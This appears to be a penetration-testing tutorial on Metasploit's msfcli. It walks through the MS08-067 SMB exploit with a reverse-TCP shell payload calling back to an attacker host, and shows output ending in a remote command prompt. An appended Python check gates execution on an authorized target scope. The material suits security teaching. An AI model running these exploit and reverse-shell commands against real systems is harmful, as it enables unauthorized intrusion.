MSFCLI

As with the MSFConsole interface, the CLI provides extensive coverage of the various modules, any of which can be launched at a given time. However, it lacks some of the advanced automation features of MSFConsole.

To access msfcli, use the Terminal to execute the following command:

    # msfcli -x

This will display all of the available modes, similar to those of MSFConsole, as well as usage instructions for selecting a particular module and setting its parameters. Note that all variables or parameters must follow the param=value convention and that all options are case-sensitive. The following short exercise selects and executes a particular exploit:

    # msfcli windows/smb/ms08_067_netapi O
    [*] Please wait while we load the module tree...
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST                     yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

The O at the end of the preceding command instructs the framework to display the available options for the selected exploit. The following command sets the target IP using the RHOST parameter, and the P at the end lists the payloads compatible with the exploit:

    # msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P
    [*] Please wait while we load the module tree...
    
    Compatible payloads
    ===================
    
       Name                             Description
       ----                             -----------
       generic/debug_trap               Generate a debug trap in the target process
       generic/shell_bind_tcp           Listen for a connection and spawn a command shell
       ...

Finally, after setting the target IP using the RHOST parameter, it is time to select the compatible payload and execute our exploit:

    # msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E
    [*] Please wait while we load the module tree...
    [*] Started reverse handler on 192.168.0.3:4444
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Attempting to trigger the vulnerability...
    [*] Sending stage (240 bytes) to 192.168.0.7
    [*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027)
    
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\WINDOWS\system32>

As you can see, we have acquired local shell access to our target machine after setting the LHOST parameter for the chosen payload.
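The param=value convention and case-sensitivity described above can be enforced before a command line is ever run. The following is an added example, not code from the book or from the Metasploit project: a pre-flight check that parses an msfcli-style argument list and refuses the E mode unless RHOST falls inside an authorized engagement scope. The function names and the scope network are assumptions made for illustration.

```python
import ipaddress

# Mode letters shown on this page: O (options), P (payloads), E (execute).
MODES = {"O", "P", "E"}
# Hypothetical authorized scope for the engagement (constructed value).
SCOPE = [ipaddress.ip_network("192.168.0.0/24")]


def parse_msfcli(argv):
    """Split ['module', 'NAME=value', ..., 'MODE'] into (module, params, mode)."""
    if len(argv) < 2:
        raise ValueError("expected: <module> [NAME=value ...] <mode>")
    module, *pairs, mode = argv
    if mode not in MODES:  # case-sensitive: 'e' is not 'E'
        raise ValueError(f"unknown mode {mode!r}")
    params = {}
    for pair in pairs:
        name, sep, value = pair.partition("=")
        if not sep or not name or not value:
            raise ValueError(f"not in param=value form: {pair!r}")
        if name in params:
            raise ValueError(f"duplicate parameter {name!r}")
        params[name] = value
    return module, params, mode


def check_scope(argv, scope=SCOPE):
    """Return (ok, reason). Only the E mode is gated on RHOST being in scope."""
    module, params, mode = parse_msfcli(argv)
    if mode != "E":
        return True, "read-only mode"
    rhost = params.get("RHOST")  # exact name; 'rhost' would not match
    if rhost is None:
        return False, "RHOST not set"
    try:
        addr = ipaddress.ip_address(rhost)
    except ValueError:
        return False, f"RHOST {rhost!r} is not an IP address"
    if not any(addr in net for net in scope):
        return False, f"{addr} is outside the authorized scope"
    return True, "in scope"
```

A wrapper script can call check_scope on its own arguments and exit with the returned reason when the first element is False.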
